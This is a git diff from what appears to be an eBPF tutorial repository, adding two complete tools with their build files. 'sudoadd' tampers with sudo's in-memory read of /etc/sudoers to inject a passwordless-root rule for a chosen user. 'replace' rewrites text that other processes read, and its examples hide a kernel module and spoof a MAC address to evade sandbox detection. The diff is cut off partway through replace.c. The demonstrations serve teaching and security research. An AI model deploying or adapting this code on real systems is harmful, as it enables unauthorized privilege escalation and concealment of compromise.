return 0; + } + + // Check this is the sudoers file descriptor + unsigned int map_fd = *pfd; + unsigned int fd = (unsigned int)ctx->args[0]; + if (map_fd != fd) { + return 0; + } + + // Store buffer address from arguments in map + long unsigned int buff_addr = ctx->args[1]; + bpf_map_update_elem(&map_buff_addrs, &pid_tgid, &buff_addr, BPF_ANY); + + // log and exit + size_t buff_size = (size_t)ctx->args[2]; + return 0; +} + +SEC("tp/syscalls/sys_exit_read") +int handle_read_exit(struct trace_event_raw_sys_exit *ctx) +{ + // Check this open call is reading our target file + size_t pid_tgid = bpf_get_current_pid_tgid(); + int pid = pid_tgid >> 32; + long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buff_addrs, &pid_tgid); + if (pbuff_addr == 0) { + return 0; + } + long unsigned int buff_addr = *pbuff_addr; + if (buff_addr <= 0) { + return 0; + } + + // This is amount of data returned from the read syscall + if (ctx->ret <= 0) { + return 0; + } + long int read_size = ctx->ret; + + // Add our payload to the first line + if (read_size < payload_len) { + return 0; + } + + // Overwrite first chunk of data + // then add '#'s to comment out rest of data in the chunk. + // This sorta corrupts the sudoers file, but everything still + // works as expected + char local_buff[max_payload_len] = { 0x00 }; + bpf_probe_read(&local_buff, max_payload_len, (void*)buff_addr); + for (unsigned int i = 0; i < max_payload_len; i++) { + if (i >= payload_len) { + local_buff[i] = '#'; + } + else { + local_buff[i] = payload[i]; + } + } + // Write data back to buffer + long ret = bpf_probe_write_user((void*)buff_addr, local_buff, max_payload_len); + + // Send event + struct event *e; + e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); + if (e) { + e->success = (ret == 0); + e->pid = pid; + bpf_get_current_comm(&e->comm, sizeof(e->comm)); + bpf_ringbuf_submit(e, 0); + } + return 0; +} + +SEC("tp/syscalls/sys_exit_close") +int handle_close_exit(struct trace_event_raw_sys_exit *ctx) +{ + // Check if we're a process thread of interest + size_t pid_tgid = bpf_get_current_pid_tgid(); + int pid = pid_tgid >> 32; + unsigned int* check = bpf_map_lookup_elem(&map_fds, &pid_tgid); + if (check == 0) { + return 0; + } + + // Closing file, delete fd from all maps to clean up + bpf_map_delete_elem(&map_fds, &pid_tgid); + bpf_map_delete_elem(&map_buff_addrs, &pid_tgid); + + return 0; +} diff --git a/26-sudo/sudoadd.c b/26-sudo/sudoadd.c new file mode 100644 index 0000000..fc6e1f3 --- /dev/null +++ b/26-sudo/sudoadd.c @@ -0,0 +1,175 @@ +// SPDX-License-Identifier: BSD-3-Clause +#include +#include +#include "sudoadd.skel.h" +#include "common_um.h" +#include "common.h" +#include + +#define INVALID_UID -1 +// https://stackoverflow.com/questions/3836365/how-can-i-get-the-user-id-associated-with-a-login-on-linux +uid_t lookup_user(const char *name) +{ + if(name) { + struct passwd *pwd = getpwnam(name); /* don't free, see getpwnam() for details */ + if(pwd) return pwd->pw_uid; + } + return INVALID_UID; +} + +// Setup Argument stuff +#define max_username_len 20 +static struct env { + char username[max_username_len]; + bool restrict_user; + int target_ppid; +} env; + +const char *argp_program_version = "sudoadd 1.0"; +const char *argp_program_bug_address = ""; +const char argp_program_doc[] = +"SUDO Add\n" +"\n" +"Enable a user to elevate to root\n" +"by lying to 'sudo' about the contents of /etc/sudoers file\n" +"\n" +"USAGE: ./sudoadd -u username [-t 1111] [-r uid]\n"; + +static const struct argp_option opts[] = { + { "username", 'u', 
"USERNAME", 0, "Username of user to " }, + { "restrict", 'r', NULL, 0, "Restict to only run when sudo is executed by the matching user" }, + { "target-ppid", 't', "PPID", 0, "Optional Parent PID, will only affect its children." }, + {}, +}; +static error_t parse_arg(int key, char *arg, struct argp_state *state) +{ + switch (key) { + case 'u': + if (strlen(arg) >= max_username_len) { + fprintf(stderr, "Username must be less than %d characters\n", max_username_len); + argp_usage(state); + } + strncpy(env.username, arg, sizeof(env.username)); + break; + case 'r': + env.restrict_user = true; + break; + case 't': + errno = 0; + env.target_ppid = strtol(arg, NULL, 10); + if (errno || env.target_ppid <= 0) { + fprintf(stderr, "Invalid pid: %s\n", arg); + argp_usage(state); + } + break; + case 'h': + case ARGP_KEY_ARG: + argp_usage(state); + break; + default: + return ARGP_ERR_UNKNOWN; + } + return 0; +} +static const struct argp argp = { + .options = opts, + .parser = parse_arg, + .doc = argp_program_doc, +}; + +static int handle_event(void *ctx, void *data, size_t data_sz) +{ + const struct event *e = data; + if (e->success) + printf("Tricked Sudo PID %d to allow user to become root\n", e->pid); + else + printf("Failed to trick Sudo PID %d to allow user to become root\n", e->pid); + return 0; +} + +int main(int argc, char **argv) +{ + struct ring_buffer *rb = NULL; + struct sudoadd_bpf *skel; + int err; + + // Parse command line arguments + err = argp_parse(&argp, argc, argv, 0, NULL, NULL); + if (err) { + return err; + } + if (env.username[0] == '\x00') { + printf("Username Requried, see %s --help\n", argv[0]); + exit(1); + } + + // Do common setup + if (!setup()) { + exit(1); + } + + // Open BPF application + skel = sudoadd_bpf__open(); + if (!skel) { + fprintf(stderr, "Failed to open BPF program: %s\n", strerror(errno)); + return 1; + } + + // Let bpf program know our pid so we don't get kiled by it + skel->rodata->target_ppid = env.target_ppid; + + // Copy in username + sprintf(skel->rodata->payload, "%s ALL=(ALL:ALL) NOPASSWD:ALL #", env.username); + skel->rodata->payload_len = strlen(skel->rodata->payload); + + // If restricting by UID, look it up and set it + // as this can't really be done by eBPF program + if (env.restrict_user) { + int uid = lookup_user(env.username); + if (uid == INVALID_UID) { + printf("Couldn't get UID for user %s\n", env.username); + goto cleanup; + } + skel->rodata->uid = uid; + } + + // Verify and load program + err = sudoadd_bpf__load(skel); + if (err) { + fprintf(stderr, "Failed to load and verify BPF skeleton\n"); + goto cleanup; + } + + // Attach tracepoint handler + err = sudoadd_bpf__attach( skel); + if (err) { + fprintf(stderr, "Failed to attach BPF program: %s\n", strerror(errno)); + goto cleanup; + } + + // Set up ring buffer + rb = ring_buffer__new(bpf_map__fd( skel->maps.rb), handle_event, NULL, NULL); + if (!rb) { + err = -1; + fprintf(stderr, "Failed to create ring buffer\n"); + goto cleanup; + } + + printf("Successfully started!\n"); + while (!exiting) { + err = ring_buffer__poll(rb, 100 /* timeout, ms */); + /* Ctrl-C will cause -EINTR */ + if (err == -EINTR) { + err = 0; + break; + } + if (err < 0) { + printf("Error polling perf buffer: %d\n", err); + break; + } + } + +cleanup: + sudoadd_bpf__destroy( skel); + return -err; +} diff --git a/27-replace/.gitignore b/27-replace/.gitignore new file mode 100644 index 0000000..d630f18 --- /dev/null +++ b/27-replace/.gitignore @@ -0,0 +1,9 @@ +.vscode +package.json +*.o +*.skel.json +*.skel.yaml 
+package.yaml +ecli +bootstrap +replace diff --git a/27-replace/LICENSE b/27-replace/LICENSE new file mode 100644 index 0000000..47fc3a4 --- /dev/null +++ b/27-replace/LICENSE @@ -0,0 +1,29 @@ +BSD 3-Clause License + +Copyright (c) 2020, Andrii Nakryiko +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + +1. Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + +3. Neither the name of the copyright holder nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/27-replace/Makefile b/27-replace/Makefile new file mode 100644 index 0000000..e696bfd --- /dev/null +++ b/27-replace/Makefile @@ -0,0 +1,141 @@ +# SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) +OUTPUT := .output +CLANG ?= clang +LIBBPF_SRC := $(abspath ../../libbpf/src) +BPFTOOL_SRC := $(abspath ../../bpftool/src) +LIBBPF_OBJ := $(abspath $(OUTPUT)/libbpf.a) +BPFTOOL_OUTPUT ?= $(abspath $(OUTPUT)/bpftool) +BPFTOOL ?= $(BPFTOOL_OUTPUT)/bootstrap/bpftool +LIBBLAZESYM_SRC := $(abspath ../../blazesym/) +LIBBLAZESYM_OBJ := $(abspath $(OUTPUT)/libblazesym.a) +LIBBLAZESYM_HEADER := $(abspath $(OUTPUT)/blazesym.h) +ARCH ?= $(shell uname -m | sed 's/x86_64/x86/' \ + | sed 's/arm.*/arm/' \ + | sed 's/aarch64/arm64/' \ + | sed 's/ppc64le/powerpc/' \ + | sed 's/mips.*/mips/' \ + | sed 's/riscv64/riscv/' \ + | sed 's/loongarch64/loongarch/') +VMLINUX := ../../vmlinux/$(ARCH)/vmlinux.h +# Use our own libbpf API headers and Linux UAPI headers distributed with +# libbpf to avoid dependency on system-wide headers, which could be missing or +# outdated +INCLUDES := -I$(OUTPUT) -I../../libbpf/include/uapi -I$(dir $(VMLINUX)) +CFLAGS := -g -Wall +ALL_LDFLAGS := $(LDFLAGS) $(EXTRA_LDFLAGS) + +APPS = replace # minimal minimal_legacy uprobe kprobe fentry usdt sockfilter tc ksyscall + +CARGO ?= $(shell which cargo) +ifeq ($(strip $(CARGO)),) +BZS_APPS := +else +BZS_APPS := # profile +APPS += $(BZS_APPS) +# Required by libblazesym +ALL_LDFLAGS += -lrt -ldl -lpthread -lm +endif + +# Get Clang's default includes on this system. 
We'll explicitly add these dirs +# to the includes list when compiling with `-target bpf` because otherwise some +# architecture-specific dirs will be "missing" on some architectures/distros - +# headers such as asm/types.h, asm/byteorder.h, asm/socket.h, asm/sockios.h, +# sys/cdefs.h etc. might be missing. +# +# Use '-idirafter': Don't interfere with include mechanics except where the +# build would have failed anyways. +CLANG_BPF_SYS_INCLUDES ?= $(shell $(CLANG) -v -E - &1 \ + | sed -n '/<...> search starts here:/,/End of search list./{ s| \(/.*\)|-idirafter \1|p }') + +ifeq ($(V),1) + Q = + msg = +else + Q = @ + msg = @printf ' %-8s %s%s\n' \ + "$(1)" \ + "$(patsubst $(abspath $(OUTPUT))/%,%,$(2))" \ + "$(if $(3), $(3))"; + MAKEFLAGS += --no-print-directory +endif + +define allow-override + $(if $(or $(findstring environment,$(origin $(1))),\ + $(findstring command line,$(origin $(1)))),,\ + $(eval $(1) = $(2))) +endef + +$(call allow-override,CC,$(CROSS_COMPILE)cc) +$(call allow-override,LD,$(CROSS_COMPILE)ld) + +.PHONY: all +all: $(APPS) + +.PHONY: clean +clean: + $(call msg,CLEAN) + $(Q)rm -rf $(OUTPUT) $(APPS) + +$(OUTPUT) $(OUTPUT)/libbpf $(BPFTOOL_OUTPUT): + $(call msg,MKDIR,$@) + $(Q)mkdir -p $@ + +# Build libbpf +$(LIBBPF_OBJ): $(wildcard $(LIBBPF_SRC)/*.[ch] $(LIBBPF_SRC)/Makefile) | $(OUTPUT)/libbpf + $(call msg,LIB,$@) + $(Q)$(MAKE) -C $(LIBBPF_SRC) BUILD_STATIC_ONLY=1 \ + OBJDIR=$(dir $@)/libbpf DESTDIR=$(dir $@) \ + INCLUDEDIR= LIBDIR= UAPIDIR= \ + install + +# Build bpftool +$(BPFTOOL): | $(BPFTOOL_OUTPUT) + $(call msg,BPFTOOL,$@) + $(Q)$(MAKE) ARCH= CROSS_COMPILE= OUTPUT=$(BPFTOOL_OUTPUT)/ -C $(BPFTOOL_SRC) bootstrap + + +$(LIBBLAZESYM_SRC)/target/release/libblazesym.a:: + $(Q)cd $(LIBBLAZESYM_SRC) && $(CARGO) build --features=cheader,dont-generate-test-files --release + +$(LIBBLAZESYM_OBJ): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB, $@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/libblazesym.a $@ + +$(LIBBLAZESYM_HEADER): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB,$@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/blazesym.h $@ + +# Build BPF code +$(OUTPUT)/%.bpf.o: %.bpf.c $(LIBBPF_OBJ) $(wildcard %.h) $(VMLINUX) | $(OUTPUT) $(BPFTOOL) + $(call msg,BPF,$@) + $(Q)$(CLANG) -g -O2 -target bpf -D__TARGET_ARCH_$(ARCH) \ + $(INCLUDES) $(CLANG_BPF_SYS_INCLUDES) \ + -c $(filter %.c,$^) -o $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + $(Q)$(BPFTOOL) gen object $@ $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + +# Generate BPF skeletons +$(OUTPUT)/%.skel.h: $(OUTPUT)/%.bpf.o | $(OUTPUT) $(BPFTOOL) + $(call msg,GEN-SKEL,$@) + $(Q)$(BPFTOOL) gen skeleton $< > $@ + +# Build user-space code +$(patsubst %,$(OUTPUT)/%.o,$(APPS)): %.o: %.skel.h + +$(OUTPUT)/%.o: %.c $(wildcard %.h) | $(OUTPUT) + $(call msg,CC,$@) + $(Q)$(CC) $(CFLAGS) $(INCLUDES) -c $(filter %.c,$^) -o $@ + +$(patsubst %,$(OUTPUT)/%.o,$(BZS_APPS)): $(LIBBLAZESYM_HEADER) + +$(BZS_APPS): $(LIBBLAZESYM_OBJ) + +# Build application binary +$(APPS): %: $(OUTPUT)/%.o $(LIBBPF_OBJ) | $(OUTPUT) + $(call msg,BINARY,$@) + $(Q)$(CC) $(CFLAGS) $^ $(ALL_LDFLAGS) -lelf -lz -o $@ + +# delete failed targets +.DELETE_ON_ERROR: + +# keep intermediate (.skel.h, .bpf.o, etc) targets +.SECONDARY: diff --git a/27-replace/common.h b/27-replace/common.h new file mode 100644 index 0000000..1fda5c3 --- /dev/null +++ b/27-replace/common.h @@ -0,0 +1,39 @@ +// SPDX-License-Identifier: BSD-3-Clause +#ifndef BAD_BPF_COMMON_H +#define BAD_BPF_COMMON_H + +// These are used by a number of +// different 
programs to sync eBPF Tail Call +// login between user space and kernel +#define PROG_00 0 +#define PROG_01 1 +#define PROG_02 2 + +// Used when replacing text +#define FILENAME_LEN_MAX 50 +#define TEXT_LEN_MAX 20 + +// Simple message structure to get events from eBPF Programs +// in the kernel to user spcae +#define TASK_COMM_LEN 16 +#define LOCAL_BUFF_SIZE 64 +#define loop_size 64 +#define text_len_max 20 + +struct event { + int pid; + char comm[TASK_COMM_LEN]; + bool success; +}; + +struct tr_file { + char filename[FILENAME_LEN_MAX]; + unsigned int filename_len; +}; + +struct tr_text { + char text[TEXT_LEN_MAX]; + unsigned int text_len; +}; + +#endif // BAD_BPF_COMMON_H diff --git a/27-replace/index.html b/27-replace/index.html new file mode 100644 index 0000000..390dbcd --- /dev/null +++ b/27-replace/index.html @@ -0,0 +1,219 @@ + + + + + + 使用 eBPF 替换任意程序读取或写入的文本 - bpf-developer-tutorial + + + + + + + + + + + + + + + + + + + + + + + + + + + + +

    Using eBPF to Replace Text Read or Written by Any Program

    +

    Compile:

    +
    make
    +
    +

    Usage:

    +
    sudo ./replace --filename /path/to/file --input foo --replace bar
    +
    +

    This program replaces every occurrence of the input text in a file with the replace text. This has many uses, for example:

    +

    Hide the kernel module joydev so that tools such as lsmod cannot see it:

    +
    ./replace -f /proc/modules -i 'joydev' -r 'cryptd'
    +
    +

    Fake the MAC address of the eth0 interface:

    +
    ./replace -f /sys/class/net/eth0/address -i '00:15:5d:01:ca:05' -r '00:00:00:00:00:00'
    +
    +

    Malware performing anti-sandbox checks may inspect the MAC address, looking for signs that it is running inside a virtual machine or sandbox rather than on a "real" machine.
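    Under the hood, the tool never modifies the file itself: it waits for the target process to read() the file, locates the matching bytes inside that process's user-space buffer, and overwrites them there. Below is a minimal, hedged sketch of that final step only; the program name, the hard-coded replacement string, and the placeholder address are illustrative, while the real replace.bpf.c shown later first locates the addresses with several tail-called programs.

    #include "vmlinux.h"
    #include <bpf/bpf_helpers.h>

    char LICENSE[] SEC("license") = "Dual BSD/GPL";

    // Hypothetical replacement text; replace.bpf.c fills these in from user
    // space as const volatile globals before the program is loaded.
    const volatile char text_replace[20] = "cryptd";
    const volatile unsigned int text_len = 6;

    SEC("tp/syscalls/sys_exit_read")
    int overwrite_sketch(struct trace_event_raw_sys_exit *ctx)
    {
        // In the real tool this address is found by scanning the read() buffer;
        // here it is only a placeholder so the sketch stays short.
        unsigned long name_addr = 0;
        if (!name_addr)
            return 0;
        // Patch the bytes the reading process is about to see; the file on
        // disk is never touched, which is why the technique is hard to spot.
        bpf_probe_write_user((void *)name_addr, (void *)text_replace, text_len);
        return 0;
    }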

    +

    Note: input and replace must be the same length, to avoid inserting NUL characters into the middle of a block of text. To enter a newline at a bash prompt, use $'\n', for example --replace $'text\n'.

    +

    References

    + + diff --git a/27-replace/replace.bpf.c b/27-replace/replace.bpf.c new file mode 100644 index 0000000..019b6cf --- /dev/null +++ b/27-replace/replace.bpf.c @@ -0,0 +1,333 @@ +// SPDX-License-Identifier: BSD-3-Clause +#include "vmlinux.h" +#include +#include +#include +#include "common.h" + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; + +// Ringbuffer Map to pass messages from kernel to user +struct { + __uint(type, BPF_MAP_TYPE_RINGBUF); + __uint(max_entries, 256 * 1024); +} rb SEC(".maps"); + +// Map to hold the File Descriptors from 'openat' calls +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 8192); + __type(key, size_t); + __type(value, unsigned int); +} map_fds SEC(".maps"); + +// Map to fold the buffer sized from 'read' calls +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 8192); + __type(key, size_t); + __type(value, long unsigned int); +} map_buff_addrs SEC(".maps"); + +// Map to fold the buffer sized from 'read' calls +// NOTE: This should probably be a map-of-maps, with the top-level +// key bing pid_tgid, so we know we're looking at the right program +#define MAX_POSSIBLE_ADDRS 500 +struct { + __uint(type, BPF_MAP_TYPE_ARRAY); + __uint(max_entries, MAX_POSSIBLE_ADDRS); + __type(key, unsigned int); + __type(value, long unsigned int); +} map_name_addrs SEC(".maps"); +struct { + __uint(type, BPF_MAP_TYPE_ARRAY); + __uint(max_entries, MAX_POSSIBLE_ADDRS); + __type(key, unsigned int); + __type(value, long unsigned int); +} map_to_replace_addrs SEC(".maps"); + +// Map holding the programs for tail calls +struct { + __uint(type, BPF_MAP_TYPE_PROG_ARRAY); + __uint(max_entries, 5); + __type(key, __u32); + __type(value, __u32); +} map_prog_array SEC(".maps"); + +// Optional Target Parent PID +const volatile int target_ppid = 0; + +// These store the name of the file to replace text in +const volatile int filename_len = 0; +const volatile char filename[50]; + +// These store the text to find and replace in the file +const volatile unsigned int text_len = 0; +const volatile char text_find[FILENAME_LEN_MAX]; +const volatile char text_replace[FILENAME_LEN_MAX]; + +SEC("tp/syscalls/sys_exit_close") +int handle_close_exit(struct trace_event_raw_sys_exit *ctx) +{ + // Check if we're a process thread of interest + size_t pid_tgid = bpf_get_current_pid_tgid(); + int pid = pid_tgid >> 32; + unsigned int* check = bpf_map_lookup_elem(&map_fds, &pid_tgid); + if (check == 0) { + return 0; + } + + // Closing file, delete fd from all maps to clean up + bpf_map_delete_elem(&map_fds, &pid_tgid); + bpf_map_delete_elem(&map_buff_addrs, &pid_tgid); + + return 0; +} + +SEC("tp/syscalls/sys_enter_openat") +int handle_openat_enter(struct trace_event_raw_sys_enter *ctx) +{ + size_t pid_tgid = bpf_get_current_pid_tgid(); + int pid = pid_tgid >> 32; + // Check if we're a process thread of interest + // if target_ppid is 0 then we target all pids + if (target_ppid != 0) { + struct task_struct *task = (struct task_struct *)bpf_get_current_task(); + int ppid = BPF_CORE_READ(task, real_parent, tgid); + if (ppid != target_ppid) { + return 0; + } + } + + // Get filename from arguments + char check_filename[FILENAME_LEN_MAX]; + bpf_probe_read_user(&check_filename, filename_len, (char*)ctx->args[1]); + + // Check filename is our target + for (int i = 0; i < filename_len; i++) { + if (filename[i] != check_filename[i]) { + return 0; + } + } + + // Add pid_tgid to map for our sys_exit call + unsigned int zero = 0; + bpf_map_update_elem(&map_fds, &pid_tgid, &zero, BPF_ANY); + + 
bpf_printk("[TEXT_REPLACE] PID %d Filename %s\n", pid, filename); + return 0; +} + +SEC("tp/syscalls/sys_exit_openat") +int handle_openat_exit(struct trace_event_raw_sys_exit *ctx) +{ + // Check this open call is opening our target file + size_t pid_tgid = bpf_get_current_pid_tgid(); + unsigned int* check = bpf_map_lookup_elem(&map_fds, &pid_tgid); + if (check == 0) { + return 0; + } + int pid = pid_tgid >> 32; + + // Set the map value to be the returned file descriptor + unsigned int fd = (unsigned int)ctx->ret; + bpf_map_update_elem(&map_fds, &pid_tgid, &fd, BPF_ANY); + + return 0; +} + +SEC("tp/syscalls/sys_enter_read") +int handle_read_enter(struct trace_event_raw_sys_enter *ctx) +{ + // Check this open call is opening our target file + size_t pid_tgid = bpf_get_current_pid_tgid(); + int pid = pid_tgid >> 32; + unsigned int* pfd = bpf_map_lookup_elem(&map_fds, &pid_tgid); + if (pfd == 0) { + return 0; + } + + // Check this is the correct file descriptor + unsigned int map_fd = *pfd; + unsigned int fd = (unsigned int)ctx->args[0]; + if (map_fd != fd) { + return 0; + } + + // Store buffer address from arguments in map + long unsigned int buff_addr = ctx->args[1]; + bpf_map_update_elem(&map_buff_addrs, &pid_tgid, &buff_addr, BPF_ANY); + + // log and exit + size_t buff_size = (size_t)ctx->args[2]; + bpf_printk("[TEXT_REPLACE] PID %d | fd %d | buff_addr 0x%lx\n", pid, fd, buff_addr); + bpf_printk("[TEXT_REPLACE] PID %d | fd %d | buff_size %lu\n", pid, fd, buff_size); + return 0; +} + +SEC("tp/syscalls/sys_exit_read") +int find_possible_addrs(struct trace_event_raw_sys_exit *ctx) +{ + // Check this open call is reading our target file + size_t pid_tgid = bpf_get_current_pid_tgid(); + long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buff_addrs, &pid_tgid); + if (pbuff_addr == 0) { + return 0; + } + int pid = pid_tgid >> 32; + long unsigned int buff_addr = *pbuff_addr; + long unsigned int name_addr = 0; + if (buff_addr <= 0) { + return 0; + } + + // This is amount of data returned from the read syscall + if (ctx->ret <= 0) { + return 0; + } + long int buff_size = ctx->ret; + unsigned long int read_size = buff_size; + + bpf_printk("[TEXT_REPLACE] PID %d | read_size %lu | buff_addr 0x%lx\n", pid, read_size, buff_addr); + // 64 may be to large for loop + char local_buff[LOCAL_BUFF_SIZE] = { 0x00 }; + + if (read_size > (LOCAL_BUFF_SIZE+1)) { + // Need to loop :-( + read_size = LOCAL_BUFF_SIZE; + } + + // Read the data returned in chunks, and note every instance + // of the first character of our 'to find' text. 
+ // This is all very convoluted, but is required to keep + // the program complexity and size low enough the pass the verifier checks + unsigned int tofind_counter = 0; + for (unsigned int i = 0; i < loop_size; i++) { + // Read in chunks from buffer + bpf_probe_read(&local_buff, read_size, (void*)buff_addr); + for (unsigned int j = 0; j < LOCAL_BUFF_SIZE; j++) { + // Look for the first char of our 'to find' text + if (local_buff[j] == text_find[0]) { + name_addr = buff_addr+j; + // This is possibly out text, add the address to the map to be + // checked by program 'check_possible_addrs' + bpf_map_update_elem(&map_name_addrs, &tofind_counter, &name_addr, BPF_ANY); + tofind_counter++; + } + } + + buff_addr += LOCAL_BUFF_SIZE; + } + + // Tail-call into 'check_possible_addrs' to loop over possible addresses + bpf_printk("[TEXT_REPLACE] PID %d | tofind_counter %d \n", pid, tofind_counter); + + bpf_tail_call(ctx, &map_prog_array, PROG_01); + return 0; +} + +SEC("tp/syscalls/sys_exit_read") +int check_possible_addresses(struct trace_event_raw_sys_exit *ctx) { + // Check this open call is opening our target file + size_t pid_tgid = bpf_get_current_pid_tgid(); + long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buff_addrs, &pid_tgid); + if (pbuff_addr == 0) { + return 0; + } + int pid = pid_tgid >> 32; + long unsigned int* pName_addr = 0; + long unsigned int name_addr = 0; + unsigned int newline_counter = 0; + unsigned int match_counter = 0; + + char name[text_len_max+1]; + unsigned int j = 0; + char old = 0; + const unsigned int name_len = text_len; + if (name_len < 0) { + return 0; + } + if (name_len > text_len_max) { + return 0; + } + // Go over every possibly location + // and check if it really does match our text + for (unsigned int i = 0; i < MAX_POSSIBLE_ADDRS; i++) { + newline_counter = i; + pName_addr = bpf_map_lookup_elem(&map_name_addrs, &newline_counter); + if (pName_addr == 0) { + break; + } + name_addr = *pName_addr; + if (name_addr == 0) { + break; + } + bpf_probe_read_user(&name, text_len_max, (char*)name_addr); + // for (j = 0; j < text_len_max; j++) { + // if (name[j] != text_find[j]) { + // break; + // } + // } + // we can use bpf_strncmp here, but it's not available in the kernel version older + if (bpf_strncmp(name, text_len_max, (const char *)text_find) == 0) { + // *********** + // We've found out text! 
+ // Add location to map to be overwritten + // *********** + bpf_map_update_elem(&map_to_replace_addrs, &match_counter, &name_addr, BPF_ANY); + match_counter++; + } + bpf_map_delete_elem(&map_name_addrs, &newline_counter); + } + + // If we found at least one match, jump into program to overwrite text + if (match_counter > 0) { + bpf_tail_call(ctx, &map_prog_array, PROG_02); + } + return 0; +} + +SEC("tp/syscalls/sys_exit_read") +int overwrite_addresses(struct trace_event_raw_sys_exit *ctx) { + // Check this open call is opening our target file + size_t pid_tgid = bpf_get_current_pid_tgid(); + long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buff_addrs, &pid_tgid); + if (pbuff_addr == 0) { + return 0; + } + int pid = pid_tgid >> 32; + long unsigned int* pName_addr = 0; + long unsigned int name_addr = 0; + unsigned int match_counter = 0; + + // Loop over every address to replace text into + for (unsigned int i = 0; i < MAX_POSSIBLE_ADDRS; i++) { + match_counter = i; + pName_addr = bpf_map_lookup_elem(&map_to_replace_addrs, &match_counter); + if (pName_addr == 0) { + break; + } + name_addr = *pName_addr; + if (name_addr == 0) { + break; + } + + // Attempt to overwrite data with out replace string (minus the end null bytes) + long ret = bpf_probe_write_user((void*)name_addr, (void*)text_replace, text_len); + // Send event + struct event *e; + e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); + if (e) { + e->success = (ret == 0); + e->pid = pid; + bpf_get_current_comm(&e->comm, sizeof(e->comm)); + bpf_ringbuf_submit(e, 0); + } + bpf_printk("[TEXT_REPLACE] PID %d | [*] replaced: %s\n", pid, text_find); + + // Clean up map now we're done + bpf_map_delete_elem(&map_to_replace_addrs, &match_counter); + } + + return 0; +} diff --git a/27-replace/replace.c b/27-replace/replace.c new file mode 100644 index 0000000..4e139e1 --- /dev/null +++ b/27-replace/replace.c @@ -0,0 +1,269 @@ +// SPDX-License-Identifier: BSD-3-Clause +#include +#include +#include "replace.skel.h" +#include "common.h" + + +#include +#include +#include +#include +#include +#include +#include + +static volatile sig_atomic_t exiting; + +void sig_int(int signo) +{ + exiting = 1; +} + +static bool setup_sig_handler() { + // Add handlers for SIGINT and SIGTERM so we shutdown cleanly + __sighandler_t sighandler = signal(SIGINT, sig_int); + if (sighandler == SIG_ERR) { + fprintf(stderr, "can't set signal handler: %s\n", strerror(errno)); + return false; + } + sighandler = signal(SIGTERM, sig_int); + if (sighandler == SIG_ERR) { + fprintf(stderr, "can't set signal handler: %s\n", strerror(errno)); + return false; + } + return true; +} + +static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args) +{ + return vfprintf(stderr, format, args); +} + +static bool bump_memlock_rlimit(void) +{ + struct rlimit rlim_new = { + .rlim_cur = RLIM_INFINITY, + .rlim_max = RLIM_INFINITY, + }; + + if (setrlimit(RLIMIT_MEMLOCK, &rlim_new)) { + fprintf(stderr, "Failed to increase RLIMIT_MEMLOCK limit! 
(hint: run as root)\n"); + return false; + } + return true; +} + + +static bool setup() { + // Set up libbpf errors and debug info callback + libbpf_set_print(libbpf_print_fn); + + // Bump RLIMIT_MEMLOCK to allow BPF sub-system to do anything + if (!bump_memlock_rlimit()) { + return false; + }; + + // Setup signal handler so we exit cleanly + if (!setup_sig_handler()) { + return false; + } + + return true; +} + +// Setup Argument stuff +#define filename_len_max 50 +#define text_len_max 20 +static struct env { + char filename[filename_len_max]; + char input[filename_len_max]; + char replace[filename_len_max]; + int target_ppid; +} env; + +const char *argp_program_version = "textreplace 1.0"; +const char *argp_program_bug_address = ""; +const char argp_program_doc[] = +"Text Replace\n" +"\n" +"Replaces text in a file.\n" +"To pass in newlines use \%'\\n' e.g.:\n" +" ./textreplace -f /proc/modules -i ppdev -r $'aaaa\\n'" +"\n" +"USAGE: ./textreplace -f filename -i input -r output [-t 1111]\n" +"EXAMPLES:\n" +"Hide kernel module:\n" +" ./textreplace -f /proc/modules -i 'joydev' -r 'cryptd'\n" +"Fake Ethernet adapter (used in sandbox detection): \n" +" ./textreplace -f /sys/class/net/eth0/address -i '00:15:5d:01:ca:05' -r '00:00:00:00:00:00' \n" +""; + +static const struct argp_option opts[] = { + { "filename", 'f', "FILENAME", 0, "Path to file to replace text in" }, + { "input", 'i', "INPUT", 0, "Text to be replaced in file, max 20 chars" }, + { "replace", 'r', "REPLACE", 0, "Text to replace with in file, must be same size as -t" }, + { "target-ppid", 